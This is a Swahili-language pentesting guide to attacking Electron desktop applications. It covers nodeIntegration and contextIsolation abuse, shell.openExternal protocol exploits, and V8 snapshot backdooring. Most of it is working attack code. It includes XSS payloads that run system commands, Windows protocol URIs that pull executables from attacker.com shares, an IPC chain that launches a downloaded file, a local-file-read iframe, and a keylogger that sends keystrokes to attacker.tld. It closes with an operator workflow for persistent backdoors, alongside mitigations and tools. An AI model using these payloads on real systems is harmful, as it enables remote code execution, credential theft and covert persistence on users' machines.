Electron Programu za Desktop

Reading time: 22 minutes

Utangulizi

Electron huunganisha backend ya ndani (kwa NodeJS) na frontend (Chromium), ingawa inakosa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.

Kawaida msimbo wa app ya Electron unaweza kupatikana ndani ya faili .asar; ili kupata msimbo huo, unahitaji kuutoa:

npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file

Katika msimbo wa chanzo wa Electron app, ndani ya packet.json, unaweza kupata main.js iliyotajwa ambapo mipangilio ya usalama imewekwa.

{
"name": "standard-notes",
"main": "./app/index.js",

Electron ina aina 2 za michakato:

• Mchakato Mkuu (unao ufikiaji kamili wa NodeJS)
• Mchakato wa Renderer (unapaswa kuwa na ufikiaji wa NodeJS uliopunguzwa kwa sababu za usalama)

Mchakato wa renderer utakuwa dirisha la kivinjari linalopakua faili:

const { BrowserWindow } = require("electron")
let win = new BrowserWindow()

//Open Renderer Process
win.loadURL(`file://path/to/index.html`)

Mipangilio ya renderer process yanaweza kuwekwa katika main process ndani ya faili main.js. Baadhi ya mipangilio hii inaweza kuzuia Electron application kupata RCE au udhaifu mwingine ikiwa mipangilio imewekwa kwa usahihi.

Electron application inaweza kupata ufikiaji wa kifaa kupitia Node apis, ingawa inaweza kusanidiwa ili kuzuia hilo:

• nodeIntegration - ni off kwa chaguo-msingi. Ikiwa imewashwa, inaruhusu kupata Node features kutoka kwa renderer process.
• contextIsolation - ni on kwa chaguo-msingi. Ikiwa imezimwa, main na renderer processes hazitatenganishwa.
• preload - tupu kwa chaguo-msingi.
• sandbox - ni off kwa chaguo-msingi. Itapunguza vitendo ambavyo NodeJS inaweza kufanya.
• Node Integration in Workers
• nodeIntegrationInSubframes - ni off kwa chaguo-msingi.
• Ikiwa nodeIntegration imewezeshwa, hii itaruhusu matumizi ya Node.js APIs katika kurasa za wavuti ambazo ziliopakiwa katika iframes ndani ya Electron application.
• Ikiwa nodeIntegration imezimwa, basi preloads zitaingizwa ndani ya iframe

Mfano wa usanidi:

const mainWindowOptions = {
title: "Discord",
backgroundColor: getBackgroundColor(),
width: DEFAULT_WIDTH,
height: DEFAULT_HEIGHT,
minWidth: MIN_WIDTH,
minHeight: MIN_HEIGHT,
transparent: false,
frame: false,
resizable: true,
show: isVisible,
webPreferences: {
blinkFeatures: "EnumerateDevices,AudioOutputDevices",
nodeIntegration: false,
contextIsolation: false,
sandbox: false,
nodeIntegrationInSubFrames: false,
preload: _path2.default.join(__dirname, "mainScreenPreload.js"),
nativeWindowOpen: true,
enableRemoteModule: false,
spellcheck: true,
},
}

Baadhi ya RCE payloads kutoka here:

Example Payloads (Windows):
<img
src="x"
onerror="alert(require('child_process').execSync('calc').toString());" />

Example Payloads (Linux & MacOS):
<img
src="x"
onerror="alert(require('child_process').execSync('gnome-calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('id').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('ls -l').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('uname -a').toString());" />

Kukamata trafiki

Badilisha usanidi wa start-main na uongeze matumizi ya proxy kama:

"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",

Electron Local Code Injection

Ikiwa unaweza kuendesha Electron App ndani ya mashine, kuna uwezekano ukaifanya itekeleze arbitrary javascript code. Angalia jinsi katika:

macOS Electron Applications Injection

RCE: XSS + nodeIntegration

Ikiwa nodeIntegration imewekwa kwa on, JavaScript ya ukurasa wa wavuti inaweza kutumia sifa za Node.js kwa urahisi kwa kuitaja require(). Kwa mfano, njia ya kuendesha application ya calc kwenye Windows ni:

<script>
require("child_process").exec("calc")
// or
top.require("child_process").exec("open /System/Applications/Calculator.app")
</script>

RCE: preload

Script iliyotajwa katika mpangilio huu ni lilipakiwa kabla ya scripts nyingine katika renderer, kwa hivyo ina ufikiaji usio na mipaka kwa Node APIs:

new BrowserWindow{
webPreferences: {
nodeIntegration: false,
preload: _path2.default.join(__dirname, 'perload.js'),
}
});

Kwa hivyo, script inaweza kuhamisha node-features kwa kurasa:

typeof require === "function"
window.runCalc = function () {
require("child_process").exec("calc")
}

<body>
<script>
typeof require === "undefined"
runCalc()
</script>
</body>

[!NOTE] > Ikiwa contextIsolation imewashwa, hii haitafanya kazi

RCE: XSS + contextIsolation

contextIsolation inatoa muktadha tofauti kati ya script za ukurasa wa wavuti na JavaScript Electron's internal code, ili utekelezaji wa JavaScript upande mmoja usiathiri mwingine. Hii ni sifa muhimu ili kuondoa uwezekano wa RCE.

Kama muktadha haujatengwa mshambulizi anaweza:

1. Kuendesha arbitrary JavaScript in renderer (XSS au kuvinjari kwenda tovuti za nje)
2. Overwrite the built-in method ambayo inatumiwa katika preload au Electron internal code ili kupata udhibiti
3. Trigger matumizi ya overwritten function
4. RCE?

There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code:

Electron contextIsolation RCE via preload code

Electron contextIsolation RCE via Electron internal code

Electron contextIsolation RCE via IPC

Bypass click event

Kama kuna vikwazo vinavyowekwa unapobofya link, huenda ukaweza kuvipita kwa doing a middle click badala ya left click ya kawaida

window.addEventListener('click', (e) => {

RCE kupitia shell.openExternal

Kwa habari zaidi kuhusu mifano hii angalia https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8 na https://benjamin-altpeter.de/shell-openexternal-dangers/

Unapoweka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya nodeIntegration na contextIsolation ni muhimu. Imebainika kwamba client-side remote code execution (RCE) inayolenga preload scripts au native code ya Electron kutoka main process inazuia kwa ufanisi ikiwa mipangilio hii iko.

Wakati mtumiaji abofya linki au kufungua dirisha jipya, wasikilizaji maalum wa matukio huchochewa, ambazo ni muhimu kwa usalama na utendaji wa programu:

webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}

Wasikilizaji hawa yamebadilishwa tena na programu ya desktop ili kutekeleza mantiki ya biashara yake. Programu inatathmini kama kiungo kilichoelekezwa kinapaswa kufunguliwa ndani au katika kivinjari cha nje. Uamuzi huu kawaida hufanywa kupitia function, openInternally. Iwapo function hii inarudisha false, inaonyesha kwamba kiungo kinapaswa kufunguliwa nje kwa kutumia function shell.openExternal.

Hapa kuna pseudocode iliyorahisishwa:

Miongozo ya usalama ya Electron JS yanashauri kutoikubali content isiyo ya kuaminika kwa function openExternal, kwani inaweza kusababisha RCE kupitia protocols mbalimbali. Operating systems zinaunga mkono protocols tofauti ambazo zinaweza kuzusha RCE. Kwa mifano na maelezo zaidi juu ya mada hii, rejea this resource, ambayo inajumuisha Windows protocol examples zenye uwezo wa kutumika ku-exploit udhaifu huu.

Katika macos, function openExternal inaweza kutumiwa ku-exploit ili kutekeleza amri za kiholela, kama shell.openExternal('file:///System/Applications/Calculator.app').

Mifano ya Windows protocol exploits ni pamoja na:

<script>
window.open(
"ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22"
)
</script>

<script>
window.open(
"search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update"
)
</script>

<script>
window.open(
"ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D"
)
</script>

RCE: webviewTag + vulnerable preload IPC + shell.openExternal

Vuln hii inaweza kupatikana katika this report.

The webviewTag ni kipengele kilichopitwa na wakati kinachoruhusu matumizi ya NodeJS katika renderer process, na kinapaswa kuzimwa kwa kuwa kinaruhusu kupakia script ndani ya preload context kama:

<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>

Kwa hivyo, mshambuliaji anayefanikiwa kupakia ukurasa wowote angeweza kutumia tag hiyo ili load an arbitrary preload script.

Preload script hii ilitumiwa vibaya kisha kuita vulnerable IPC service (skype-new-window) ambayo ilikuwa ikitumia shell.openExternal ili kupata RCE:

(async() => {
const { ipcRenderer } = require("electron");
await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
setTimeout(async () => {
const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
}, 5000);
})();

Kusoma Faili za Ndani: XSS + contextIsolation

Kuzima contextIsolation kunaruhusu matumizi ya tagi za <webview>, sawa na <iframe>, kwa kusoma na exfiltrate local files. Mfano uliotolewa unaonyesha jinsi ya kutumia udhaifu huu kusoma yaliyomo ya faili za ndani:

Zaidi ya hayo, njia nyingine ya kusoma faili ya ndani imeshirikiwa, ikionyesha udhaifu muhimu wa local file read katika Electron desktop app. Hii inahusisha kuingiza script ili exploit application na exfiltrate data:

<br /><br /><br /><br />
<h1>
pwn<br />
<iframe onload="j()" src="/etc/hosts">xssxsxxsxs</iframe>
<script type="text/javascript">
function j() {
alert(
"pwned contents of /etc/hosts :\n\n " +
frames[0].document.body.innerText
)
}
</script>
</h1>

RCE: XSS + Old Chromium

Ikiwa chromium inayotumiwa na application ni old na kuna known vulnerabilities juu yake, inaweza kuwa inawezekana kufanya exploit it and obtain RCE through a XSS.
Unaweza kuona mfano katika hii writeup: https://blog.electrovolt.io/posts/discord-rce/

XSS Phishing via Internal URL regex bypass

Ikiwa umepata XSS lakini cannot trigger RCE or steal internal files, unaweza kujaribu kuitumia ili steal credentials via phishing.

Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, kwa kuangalia JS code katika front-end:

webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)

Kiito cha openInternally kitaamua kama link itafunguliwa ndani ya dirisha la desktop kwa kuwa ni link inayomilikiwa na platform, au itafunguliwa kwenye kivinjari kama rasilimali ya pande ya tatu.

Ikiwa regex inayotumiwa na function ni dhaifu dhidi ya bypasses (kwa mfano kwa kutokukimbia alama za dot za subdomains) mshambulizi anaweza kutumia XSS kufungua dirisha jipya ambalo litakuwa katika miundombinu ya mshambulizi likiomba mtumiaji taarifa za kuingia:

<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>

file:// Protocol

As mentioned in the docs kurasa zinazoendesha kwa file:// zina ufikiaji wa upande mmoja kwa kila faili kwenye mashine yako, ikimaanisha kwamba masuala ya XSS yanaweza kutumika kupakia faili zozote kutoka kwa mashine ya mtumiaji. Kutumia custom protocol kunazuia matatizo kama haya kwani unaweza kuzuia protocol hiyo kutoa seti maalum tu ya mafaili.

Remote module

The Electron Remote module inaruhusu mchakato za renderer kupata API za mchakato mkuu, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha module hii kunaleta hatari kubwa za usalama. Inapanua uso wa mashambulizi ya programu, kuifanya iwe rahisi kuathiriwa na vunjo kama mashambulizi ya cross-site scripting (XSS).

Tangu Electron 14, remote module ya Electron inaweza kuwa imeamilishwa kwa njia mbalimbali; kutokana na sababu za usalama na utendaji, inashauriwa kutoitumia.

To enable it, it'd first needed to enable it in the main process:

const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
[...]
function createMainWindow() {
mainWindow = new BrowserWindow({
[...]
})
remoteMain.enable(mainWindow.webContents)

Kisha, mchakato wa renderer unaweza kuagiza vitu kutoka kwa module kama ifuatavyo:

import { dialog, getCurrentWindow } from '@electron/remote'

The blog post inaonyesha baadhi ya functions za kuvutia zilizofichuliwa na kitu app kutoka kwenye remote module:

• app.relaunch([options])
• Inarejesha programu kwa kutoka kwenye mfano uliopo na kuanzisha mpya. Inafaa kwa sasisho za app au mabadiliko makubwa ya hali.
• app.setAppLogsPath([path])
• Inaelezea au inaunda saraka kwa kuhifadhi app logs. Logs zinaweza kupatikana au kubadilishwa kwa kutumia app.getPath() au app.setPath(pathName, newPath).
• app.setAsDefaultProtocolClient(protocol[, path, args])
• Inasajili executable ya sasa kama default handler kwa protocol iliyotajwa. Unaweza kutoa custom path na arguments kama inahitajika.
• app.setUserTasks(tasks)
• Inaongeza tasks kwenye Tasks category ya Jump List (Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa (launched) au ni arguments gani zinapitishwa.
• app.importCertificate(options, callback)
• Inaleta cheti cha PKCS#12 kwenye certificate store ya mfumo (Linux tu). Callback inaweza kutumika kushughulikia matokeo.
• app.moveToApplicationsFolder([options])
• Inahamisha programu kwenda kwenye Applications folder (macOS). Inasaidia kuhakikisha usakinishaji wa kawaida kwa watumiaji wa Mac.
• app.setJumpList(categories)
• Inaweka au inaondoa custom Jump List kwenye Windows. Unaweza kubainisha categories ili kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
• app.setLoginItemSettings(settings)
• Inakonfigurisha ni executables zipi zinazoanzishwa wakati wa login pamoja na options zao (macOS na Windows tu).

Mfano:

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

systemPreferences moduli

The API kuu ya kupata mapendeleo ya mfumo na kutuma matukio ya mfumo katika Electron. Mbinu kama subscribeNotification, subscribeWorkspaceNotification, getUserDefault, na setUserDefault zote ni sehemu ya moduli hii.

Mfano wa matumizi:

const { systemPreferences } = require('electron');

// Subscribe to a specific notification
systemPreferences.subscribeNotification('MyCustomNotification', (event, userInfo) => {
console.log('Received custom notification:', userInfo);
});

// Get a user default key from macOS
const recentPlaces = systemPreferences.getUserDefault('NSNavRecentPlaces', 'array');
console.log('Recent Places:', recentPlaces);

subscribeNotification / subscribeWorkspaceNotification

• Inasikiliza notifikasi za asili za macOS kwa kutumia NSDistributedNotificationCenter.
• Kabla ya macOS Catalina, unaweza sniff all distributed notifications kwa kupitisha nil kwa CFNotificationCenterAddObserver.
• Baada ya Catalina / Big Sur, apps zilizowekwa ndani ya sandbox bado zinaweza kujiandikisha kwa many events (kwa mfano, screen locks/unlocks, volume mounts, network activity, nk) kwa kujiandikisha notifications by name.

getUserDefault / setUserDefault

• Inajihusisha na NSUserDefaults, ambayo inahifadhi mapendeleo ya application au global kwenye macOS.

• getUserDefault inaweza retrieve taarifa nyeti, kama recent file locations au user’s geographic location.

• setUserDefault inaweza modify mapendeleo haya, ikiathiri configuration ya app.

• Katika older Electron versions (kabla ya v8.3.0), tu standard suite ya NSUserDefaults ilikuwa accessible.

Shell.showItemInFolder

Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza kutekeleza faili hiyo moja kwa moja.

For more information check https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html

Content Security Policy

Apps za Electron zinapaswa kuwa na Content Security Policy (CSP) ili kuzuia XSS attacks. CSP ni standard ya usalama inayosaidia kuzuia execution ya untrusted code kwenye browser.

Kwa kawaida imesanidiwa katika faili ya main.js au katika template ya index.html na CSP ndani ya meta tag.

For more information check:

Content Security Policy (CSP) Bypass

RCE: Webview CSP + postMessage trust + local file loading (VS Code 1.63)

Chain ya dunia halisi iliyoathiri Visual Studio Code 1.63 (CVE-2021-43908) inaonyesha jinsi XSS moja inayosababishwa na markdown katika webview inaweza kuongezwa hadi RCE kamili pale CSP, postMessage, na scheme handlers zikipangwa vibaya. Public PoC: https://github.com/Sudistark/vscode-rce-electrovolt

Attack chain overview

• First XSS via webview CSP: The generated CSP included style-src 'self' 'unsafe-inline', allowing inline/style-based injection in a vscode-webview:// context. The payload beaconed to /stealID to exfiltrate the target webview’s extensionId.
• Constructing target webview URL: Using the leaked ID to build vscode-webview://<extensionId>/.../<publicUrl>.
• Second XSS via postMessage trust: The outer webview trusted window.postMessage without strict origin/type checks and loaded attacker HTML with allowScripts: true.
• Local file loading via scheme/path rewriting: The payload rewrote file:///... to vscode-file://vscode-app/... and swapped exploit.md for RCE.html, abusing weak path validation to load a privileged local resource.
• RCE in Node-enabled context: The loaded HTML executed with Node APIs available, yielding OS command execution.

Example RCE primitive in the final context

// RCE.html (executed in a Node-enabled webview context)
require('child_process').exec('calc.exe');            // Windows
require('child_process').exec('/System/Applications/Calculator.app'); // macOS

Usomaji unaohusiana na matatizo ya kuamini postMessage:

PostMessage Vulnerabilities

Zana

• Electronegativity ni zana ya kutambua misanidi isiyo sahihi na anti-patterns za usalama katika Electron-based applications.
• Electrolint ni plugin ya chanzo wazi ya VS Code kwa Electron applications inayotumia Electronegativity.
• nodejsscan kwa kukagua third party libraries zilizo hatarini
• Electro.ng: Unahitaji kuinunua

Maabara

Kwenye https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s unaweza kupata maabara ya ku-exploit Electron apps zilizo hatarishi.

Baadhi ya amri zitakazokusaidia katika maabara:

# Download apps from these URls
# Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
# Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
# Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip

# Get inside the electron app and check for vulnerabilities
npm audit

# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1

# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start

Local backdooring via V8 heap snapshot tampering (Electron/Chromium) – CVE-2025-55305

Apps zilizo kwenye msingi wa Electron na Chromium hufanya deserialize V8 heap snapshot iliyotayarishwa kabla wakati wa kuanzishwa (v8_context_snapshot.bin, na hiari browser_v8_context_snapshot.bin) ili kuanzisha kila V8 isolate (main, preload, renderer). Kwa kihistoria, integrity fuses za Electron hazikutambua snapshots hizi kama yaliyomo yanayotekelezeka, hivyo ziliepuka enforcement ya integriti ya fuses na ukaguzi wa OS code-signing. Kwa hivyo, kubadilisha snapshot kwenye usakinishaji unaoweza kuandikwa na mtumiaji kulitoa utekelezaji wa msimbo kwa siri na wa kudumu ndani ya app bila kubadilisha binaries zilizotiwa saini au ASAR.

Key points

• Integrity gap: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar validate app JavaScript inside the ASAR, but they did not cover V8 heap snapshots (CVE-2025-55305). Chromium similarly does not integrity-check snapshots.
• Attack preconditions: Local file write into the app’s installation directory. This is common on systems where Electron apps or Chromium browsers are installed under user-writable paths (e.g., %AppData%\Local on Windows; /Applications with caveats on macOS).
• Effect: Reliable execution of attacker JavaScript in any isolate by clobbering a frequently used builtin (a “gadget”), enabling persistence and evasion of code-signing verification.
• Affected surface: Electron apps (even with fuses enabled) and Chromium-based browsers that load snapshots from user-writable locations.

Generating a malicious snapshot without building Chromium

• Use the prebuilt electron/mksnapshot to compile a payload JS into a snapshot and overwrite the application’s v8_context_snapshot.bin.

Example minimal payload (prove execution by forcing a crash)

// Build snapshot from this payload
// npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
// Replace the application’s v8_context_snapshot.bin with the generated file

const orig = Array.isArray;

// Use Array.isArray as a ubiquitous gadget
Array.isArray = function () {
// Executed whenever the app calls Array.isArray
throw new Error("testing isArray gadget");
};

Isolate-aware payload routing (endesha code tofauti kwenye main vs. renderer)

• Utambuzi wa main process: Node-only globals like process.pid, process.binding(), or process.dlopen zipo katika main process isolate.
• Utambuzi wa Browser/renderer: Browser-only globals like alert zinapatikana wakati zinapoendeshwa katika document context.

Mfano wa gadget unaochunguza uwezo wa Node wa main-process mara moja

const orig = Array.isArray;

Array.isArray = function() {
// Defer until we land in main (has Node process)
try {
if (!process || !process.pid) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}

// Run once
if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
console.log('[payload] isArray hook started ...');

// Capability probing in main
console.log(`[payload] unconstrained fetch available: [${fetch ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained fs available: [${process.binding('fs') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained spawn available: [${process.binding('spawn_sync') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained dlopen available: [${process.dlopen ? 'y' : 'n'}]`);
process.exit(0);
}
return orig(...arguments);
};

PoC ya wizi wa data katika Renderer/browser-context (mfano: Slack)

const orig = Array.isArray;
Array.isArray = function() {
// Wait for a browser context
try {
if (!alert) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}

if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
setInterval(() => {
window.onkeydown = (e) => {
fetch('http://attacker.tld/keylogger?q=' + encodeURIComponent(e.key), {mode: 'no-cors'})
}
}, 1000);
}
return orig(...arguments);
};

Mtiririko wa Operator

1. Andika payload.js inayobadilisha builtin ya kawaida (mfano, Array.isArray) na kwa hiari uweke matawi kwa kila isolate.
2. Jenga snapshot bila vyanzo vya Chromium:

• npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"

3. Kubadilisha faili(ya) snapshot za programu lengwa:

• v8_context_snapshot.bin (inayotumika kila wakati)
• browser_v8_context_snapshot.bin (ikiwa fuse ya LoadBrowserProcessSpecificV8Snapshot inatumika)

4. Anzisha programu; gadget inatekelezwa kila wakati builtin iliyochaguliwa inapotumika.

Vidokezo na mambo ya kuzingatia

• Integrity/signature bypass: Faili za snapshot hazichukuliwi kama native executables na ukaguzi wa code-signing, na (kihistoria) hazikuwa zimefunikwa na fuses za Electron au udhibiti wa integrity wa Chromium.
• Persistence: Kubadilisha snapshot katika install inayoweza kuandikwa na mtumiaji kwa kawaida hudumu baada ya kuanzisha upya app na inaonekana kama app iliosainiwa, halali.
• Chromium browsers: Wazo sawa la uharibifu linatumika kwa Chrome/derivatives zilizosakinishwa katika maeneo yanayoweza kuandikwa na mtumiaji. Chrome ina mbinu nyingine za kupunguza matatizo ya integrity lakini waziwazi inaondoa mashambulizi ya kimwili ya eneo kutoka kwenye model yake ya vitisho.

Ugunduzi na kupunguza

• Tibu snapshots kama maudhui yanayotekelezwa na uyajumuishe katika utekelezaji wa integrity (suluhisho la CVE-2025-55305).
• Pendelea maeneo ya usakinishaji yanayoweza kuandikwa tu na admin; tengeneza msingi na fuatilia hashes za v8_context_snapshot.bin na browser_v8_context_snapshot.bin.
• Gundua kubadilishwa kwa builtin mapema kwenye runtime na mabadiliko yasiyotegemewa ya snapshot; toa onyo wakati snapshots zilizo deserialized hazilingani na thamani zilizotarajiwa.

Marejeo

• Trail of Bits: Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
• Electron fuses
• Electron ASAR integrity
• V8 custom startup snapshots
• electron/mksnapshot
• MITRE ATT&CK T1218.015
• Loki C2
• Chromium: Disable loading of unsigned code (CIG)
• Chrome security FAQ: physically local attacks out of scope
• https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028
• https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d
• https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8
• https://www.youtube.com/watch?v=a-YnG3Mx-Tg
• https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s
• More researches and write-ups about Electron security in https://github.com/doyensec/awesome-electronjs-hacking
• https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81
• https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html